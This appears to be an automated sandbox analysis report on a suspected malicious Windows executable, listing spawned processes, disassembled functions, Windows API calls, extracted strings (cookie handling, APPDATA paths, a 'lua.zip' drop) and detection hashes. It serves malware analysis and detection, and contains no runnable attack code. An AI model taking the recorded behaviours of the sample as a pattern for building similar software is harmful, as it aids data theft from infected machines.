MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: findstr.exe PID: 7136 Parent PID: 6984

General

Start time:	10:29:40
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr LISTEN
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: findstr.exe PID: 5436 Parent PID: 6984

General

Start time:	10:29:40
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr 127.0.0.1:
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: WhQZ6UbCEY.exe PID: 2328 Parent PID: 5784 WhQZ6UbCEY.exeCOMMON

Executed Functions

Function 00007FF7BF6785A0, Relevance: 42.8, APIs: 6, Strings: 17, Instructions: 2548memorythreadCOMMON

Download Yara Rule

APIs

WakeAllConditionVariable.KERNEL32 ref: 00007FF7BF67A68F
AddVectoredExceptionHandler.KERNEL32 ref: 00007FF7BF67B363
SetThreadStackGuarantee.KERNEL32 ref: 00007FF7BF67B37C
GetLastError.KERNEL32 ref: 00007FF7BF67B385
GetProcessHeap.KERNEL32 ref: 00007FF7BF67B393
HeapAlloc.KERNEL32 ref: 00007FF7BF67B3A3

Strings

cannot access a Thread Local Storage value during or after destruction, xrefs: 00007FF7BF67A2B2
there is no reactor running, must be called from the context of a Tokio 1.x runtime, xrefs: 00007FF7BF67A1E8
failed to reserve stack space for exception handling, xrefs: 00007FF7BF67B444
invalid state, xrefs: 00007FF7BF67A28E
arenegyl, xrefs: 00007FF7BF678A65
assertion failed: self.tail.is_none(), xrefs: 00007FF7BF67B324
Cannot drop a runtime in a context where blocking is not allowed. This happens when a runtime is dropped from within an asynchronous context., xrefs: 00007FF7BF67B33C
failed to install exception handler, xrefs: 00007FF7BF67B41E
Oh no! We never placed the Inner state back, this is a bug!, xrefs: 00007FF7BF67A2CF
setybdet, xrefs: 00007FF7BF678A7A
Failed to `Enter::block_on`, xrefs: 00007FF7BF67A1C9
called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF67A238
failed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs, xrefs: 00007FF7BF67A271
internal error: entered unreachable codewaker missing, xrefs: 00007FF7BF67A14A
assertion failed: context.tasks.borrow().owned.is_empty(), xrefs: 00007FF7BF67B30C
modnarod, xrefs: 00007FF7BF678A44
uespemos, xrefs: 00007FF7BF678A34

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocConditionErrorExceptionGuaranteeHandlerLastProcessStackThreadVariableVectoredWake
String ID: Cannot drop a runtime in a context where blocking is not allowed. This happens when a runtime is dropped from within an asynchronous context.$Failed to `Enter::block_on`$Oh no! We never placed the Inner state back, this is a bug!$arenegyl$assertion failed: context.tasks.borrow().owned.is_empty()$assertion failed: self.tail.is_none()$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs$cannot access a Thread Local Storage value during or after destruction$failed to install exception handler$failed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs$failed to reserve stack space for exception handling$internal error: entered unreachable codewaker missing$invalid state$modnarod$setybdet$there is no reactor running, must be called from the context of a Tokio 1.x runtime$uespemos
API String ID: 3892847811-1889962447
Opcode ID: 82856ef7550db95bcb3a7762dc8d4e843f81d1d70855eb793b5cc50aaffbc62d
Instruction ID: 14ee7e9ae1a1ec2225d203d92ec43ce7ec0277a9ae4a72ad390542a0413b0182
Opcode Fuzzy Hash: 82856ef7550db95bcb3a7762dc8d4e843f81d1d70855eb793b5cc50aaffbc62d
Instruction Fuzzy Hash: DB439422A09BC181EA60EB59E4403FAE3A5FBAAB84F844135DF8D47B99DF3CD545C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF672B68, Relevance: 20.0, APIs: 1, Strings: 10, Instructions: 744COMMON

Download Yara Rule

Strings

D, xrefs: 00007FF7BF672CF6
failed to spawn thread, xrefs: 00007FF7BF67821D
Client::new(), xrefs: 00007FF7BF67831D
*/*NO_PROXYno_proxy, xrefs: 00007FF7BF673055
APPDATA, xrefs: 00007FF7BF672E2F
called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF6781ED
`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs, xrefs: 00007FF7BF6781AE, 00007FF7BF678366, 00007FF7BF67838E
Pending error polled more than once, xrefs: 00007FF7BF678335
httphttpswswssfile//, xrefs: 00007FF7BF6744DC
Z, xrefs: 00007FF7BF674223

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: */*NO_PROXYno_proxy$APPDATA$Client::new()$D$Pending error polled more than once$Z$`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs$failed to spawn thread$httphttpswswssfile//
API String ID: 0-1958038414
Opcode ID: ae9f6dfc1ce3dda4a0265666c1c100d97e32e977e41573ac14a4cb86a5031215
Instruction ID: 995b320c708cb9d18ebf3070d7df004fd5b001dfe3aee318fae0e0a41f8b8a60
Opcode Fuzzy Hash: ae9f6dfc1ce3dda4a0265666c1c100d97e32e977e41573ac14a4cb86a5031215
Instruction Fuzzy Hash: 47825B32508BC581E761AB58E4413EAB3A4FBAAB48F848135DF8C07B99DF7CD195CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7298D0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 132memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF72992A
HeapAlloc.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF72993A
GetProcessHeap.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF729955
HeapAlloc.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF729965
GetProcessHeap.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF729980
HeapAlloc.KERNEL32(?,?,?,00007FF7BF729873,?,?,?,?,?,?,?,?,00007FF7BF729560), ref: 00007FF7BF729990
WSAStartup.WS2_32 ref: 00007FF7BF729A4F

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF729A72
assertion failed: len as usize >= mem::size_of::<c::sockaddr_in>(), xrefs: 00007FF7BF7299F2
assertion failed: len as usize >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF7BF7299D8

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess$Startup
String ID: assertion failed: len as usize >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len as usize >= mem::size_of::<c::sockaddr_in>()$called `Option::unwrap()` on a `None` value
API String ID: 4108985043-2761596415
Opcode ID: 649b9dc10eeb5db807b5866cfd19345e8b624c96619eeda65d1f03ee889527a2
Instruction ID: 6afe7a072fbc205f29988bf0c8e98817fc2fb412b62adf574db87c1260b8e083
Opcode Fuzzy Hash: 649b9dc10eeb5db807b5866cfd19345e8b624c96619eeda65d1f03ee889527a2
Instruction Fuzzy Hash: 9B51A726D086C641F7257BA8E8013F9A261DBAAF44FC5C075DB8C0769AEE3CF5859320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF672BE6, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 1899COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF67839E
`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs, xrefs: 00007FF7BF678366, 00007FF7BF67838E
Silverlightload task err, xrefs: 00007FF7BF677438
Pending error polled more than once, xrefs: 00007FF7BF678335
httphttpswswssfile//, xrefs: 00007FF7BF675FEE
cookie2, xrefs: 00007FF7BF676588

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: Pending error polled more than once$Silverlightload task err$`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs$called `Option::unwrap()` on a `None` value$cookie2$httphttpswswssfile//
API String ID: 1617791916-2056245858
Opcode ID: 9b5913e52210a036f896d9dca07c606da2723e748f0eb529ca7d7c3927199f3c
Instruction ID: 8946902931029fd574969bb947b7f6bb401cadabbd71e2304b46d925d34cfb8c
Opcode Fuzzy Hash: 9b5913e52210a036f896d9dca07c606da2723e748f0eb529ca7d7c3927199f3c
Instruction Fuzzy Hash: 0A235F32A08BC181E621AB59E4453EDB3A5FBA9B88F848131DF8C17799DF3CE195C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF674507, Relevance: 10.0, Strings: 7, Instructions: 1219COMMON

Download Yara Rule

Strings

Basic integer overflow when calculating buffer size, xrefs: 00007FF7BF6753B8
has_authority means set_username shouldn't fail, xrefs: 00007FF7BF6752E9
://, xrefs: 00007FF7BF67474E
has_authority means set_password shouldn't fail, xrefs: 00007FF7BF67530C
`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs, xrefs: 00007FF7BF6781AE, 00007FF7BF678366, 00007FF7BF67838E
httphttpswswssfile//, xrefs: 00007FF7BF674922
usize overflow when calculating buffer size, xrefs: 00007FF7BF6783B0

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ://$Basic integer overflow when calculating buffer size$`async fn` resumed after completionfailed to park threadC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\tokio-1.6.1\src\runtime\thread_pool\mod.rs$has_authority means set_password shouldn't fail$has_authority means set_username shouldn't fail$httphttpswswssfile//$usize overflow when calculating buffer size
API String ID: 0-3295358454
Opcode ID: 67fabe478607d6e6d0f5f6b1e782e9789dbc579ff86fec7a823ca8890f5ab47e
Instruction ID: 5cda162546c0a6e44e56adcdc8dc830a82867359f73564c9211e520fc9d9cd3b
Opcode Fuzzy Hash: 67fabe478607d6e6d0f5f6b1e782e9789dbc579ff86fec7a823ca8890f5ab47e
Instruction Fuzzy Hash: 36D26E2660CBC184E621AB59A4403EEB7A5FBA6B84F848132DFCC17B59DF3CD195CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF6BF3FC, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 321filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BF6AE74B: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF7BF672A74,?,?,?,?,?,?,?,00007FF7BF6722D9), ref: 00007FF7BF6AE75A

NtDeviceIoControlFile.NTDLL ref: 00007FF7BF6BF5A2
RtlNtStatusToDosError.NTDLL ref: 00007FF7BF6BF5B5

Strings

Out of bounds access, xrefs: 00007FF7BF6BF87F
assertion failed: i < self.len(), xrefs: 00007FF7BF6BF899

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireControlDeviceErrorExclusiveFileLockStatus
String ID: Out of bounds access$assertion failed: i < self.len()
API String ID: 2532488911-2632114829
Opcode ID: f2b431260f98d56c5e821068f3709f0b9e51560a1b5654d7713e7b1da59773ab
Instruction ID: 5c16299eb8f1d436cbb8f4bd9f05c2d23bc389da3de264f7b2b529184c048b8f
Opcode Fuzzy Hash: f2b431260f98d56c5e821068f3709f0b9e51560a1b5654d7713e7b1da59773ab
Instruction Fuzzy Hash: 53D1C472A08B8596EA50EF99E4413E9B3A9FB66B84F804135DF4D07B6ADF3CE055C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7365C4, Relevance: 2.4, Strings: 1, Instructions: 1175COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF737F82

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` value
API String ID: 0-836832528
Opcode ID: 8c4abe839142d7290f36144437b388c2412000ff07cea2dd0fcddaec6cd627ba
Instruction ID: 6106197381a9c44b05cf22c044aa9c44bccfd0275024306b1b59763ed5f8ac8d
Opcode Fuzzy Hash: 8c4abe839142d7290f36144437b388c2412000ff07cea2dd0fcddaec6cd627ba
Instruction Fuzzy Hash: 75E2CF76609BC58AD7A0DF69E4847DAB3A4F789B94F504129DBCD83B18EF38D490CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67F3CB, Relevance: 1.6, APIs: 1, Instructions: 101timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF7BF67F46C

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 379e9fc131d3d0907018363ce15b43c21291cb24fdd37c7b3333481cf7225082
Instruction ID: 66cceeb8f70e14dd8d0c81080a2aaee0942273093f306eb2b11eee196a5a0ba0
Opcode Fuzzy Hash: 379e9fc131d3d0907018363ce15b43c21291cb24fdd37c7b3333481cf7225082
Instruction Fuzzy Hash: D341D477A14B5197D714DF29E9803ACB3A0F748B54F988236DB4847BA4EB3CD566C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67F27A, Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF67F28B

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` value
API String ID: 0-836832528
Opcode ID: 8c0b9751d9d4110a3912e598a8446ceb685a2093040b8c54c316978f8f02d11f
Instruction ID: 0ecc7f0e93f31aba8f2055636122499705b88cbecac546441b7e46b01cb971cc
Opcode Fuzzy Hash: 8c0b9751d9d4110a3912e598a8446ceb685a2093040b8c54c316978f8f02d11f
Instruction Fuzzy Hash: E5010445F1D68542EE08B6AAA5116F59283AFFAFC4F84C532EE1E57B8CCE1CE5134350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72BB50, Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72BB67
HeapAlloc.KERNEL32 ref: 00007FF7BF72BB77
GetProcessHeap.KERNEL32 ref: 00007FF7BF72BBEF
HeapFree.KERNEL32 ref: 00007FF7BF72BBFC
GetLastError.KERNEL32 ref: 00007FF7BF72BC01
GetLastError.KERNEL32 ref: 00007FF7BF72BC60
GetProcessHeap.KERNEL32 ref: 00007FF7BF72BC8A
HeapFree.KERNEL32 ref: 00007FF7BF72BC97

Strings

failed to reserve stack space for exception handling, xrefs: 00007FF7BF72BCA6

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$ErrorFreeLast$Alloc
String ID: failed to reserve stack space for exception handling
API String ID: 2806166860-435990078
Opcode ID: 042b20360b0a82c13beccbed57e6390a832541ba35d5429333fe51248e343da6
Instruction ID: ac5f0f80e0739172f6c7722fb0fd0fe8baf2d2b285d2616aa6b614acafe4b63c
Opcode Fuzzy Hash: 042b20360b0a82c13beccbed57e6390a832541ba35d5429333fe51248e343da6
Instruction Fuzzy Hash: 6731B426A0468141F714BBAEE8457F9A291EBAAF90FC48474DF5C477DDEE3CD4818310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF73483B, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 313COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BF72E64F: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF7BF7302A1), ref: 00007FF7BF72E657

WakeConditionVariable.KERNEL32 ref: 00007FF7BF7348EE

Strings

arenegyl, xrefs: 00007FF7BF734ADA
assertion failed: shared.shutdown_tx.is_some(), xrefs: 00007FF7BF734CD8
uespemos, xrefs: 00007FF7BF734AC0
called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF734CBB
modnarod, xrefs: 00007FF7BF734ACD
setybdet, xrefs: 00007FF7BF734AE7

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireConditionExclusiveLockVariableWake
String ID: arenegyl$assertion failed: shared.shutdown_tx.is_some()$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs$modnarod$setybdet$uespemos
API String ID: 2350203089-3621706077
Opcode ID: 57ec35540a276aeb37ad2ff91c44fd75b64360fc3b158245be994ce0b48f9df7
Instruction ID: ca824695178ed24b754b54648b7ecac3a201fc4a702e7af5a84eeb5cf2c339f2
Opcode Fuzzy Hash: 57ec35540a276aeb37ad2ff91c44fd75b64360fc3b158245be994ce0b48f9df7
Instruction Fuzzy Hash: 41D1C036A09BC591EA54AF59E8403E9A3A4FBAAF84F944131DF8D07799DF38E152C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF671165, Relevance: 11.2, APIs: 1, Strings: 6, Instructions: 661COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF671EA1, 00007FF7BF671EBB, 00007FF7BF671ECB
\lua.zipPROGRAMDATA, xrefs: 00007FF7BF671211
(}, xrefs: 00007FF7BF67129B
System, xrefs: 00007FF7BF671569
d}, xrefs: 00007FF7BF6712B2
TEMP, xrefs: 00007FF7BF6711DA

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: System$TEMP$\lua.zipPROGRAMDATA$called `Option::unwrap()` on a `None` value$(}$d}
API String ID: 0-1115201834
Opcode ID: 3d7e4868e0fed845e6acf131586321a88a1abb042195563a520f0ffa929211aa
Instruction ID: 7f209f184621f3d9c4c461247043e500a7a491396109c60c124bc45dbc0cf22c
Opcode Fuzzy Hash: 3d7e4868e0fed845e6acf131586321a88a1abb042195563a520f0ffa929211aa
Instruction Fuzzy Hash: 89724D36A18B8692EB10EB59E4503E9A365FB9AB84FC04132DF8D07B59DF3CE156C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67116A, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 315COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7BF67139E

Strings

\lua.zipPROGRAMDATA, xrefs: 00007FF7BF671211
(}, xrefs: 00007FF7BF67129B
System, xrefs: 00007FF7BF671569
d}, xrefs: 00007FF7BF6712B2
TEMP, xrefs: 00007FF7BF6711DA

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: System$TEMP$\lua.zipPROGRAMDATA$(}$d}
API String ID: 2962429428-747846595
Opcode ID: aad1ca7762b74739a06e23c1d3e30314615b533c0a36e1d22cad840c63da9adf
Instruction ID: 3f416cac2f4e2c30c0e47e9ee87ba1e13d168cd563a734222c790caa12928e6b
Opcode Fuzzy Hash: aad1ca7762b74739a06e23c1d3e30314615b533c0a36e1d22cad840c63da9adf
Instruction Fuzzy Hash: F2E16466A09AC281EA20EB59E5413E9E365EB6AF84FC04132DF8D07B9DDF3CD146C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF724420, Relevance: 7.7, APIs: 6, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d247af1271ea22ce5c43ca3eda5822bf159feb28c1731be49757d140f42689d4
Instruction ID: 540bf03fa79e2aee3a6e95de0263539e2f20da6cd025bbc8df7fe37d1d3e311a
Opcode Fuzzy Hash: d247af1271ea22ce5c43ca3eda5822bf159feb28c1731be49757d140f42689d4
Instruction Fuzzy Hash: 9F51E415A186C641FA326B5D98013F9A350EFAFB94FC48131DF8C0679EEE3CE6868310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72BCC0, Relevance: 7.6, APIs: 5, Instructions: 67memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72BD38

Part of subcall function 00007FF7BF67B4D0: GetProcessHeap.KERNEL32(?,?,?,00007FF7BF67D529), ref: 00007FF7BF67B4DE

SetThreadDescription.KERNELBASE ref: 00007FF7BF72BD68
SetLastError.KERNEL32 ref: 00007FF7BF72BD71
GetProcessHeap.KERNEL32 ref: 00007FF7BF72BD7F
HeapFree.KERNEL32 ref: 00007FF7BF72BD8C

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
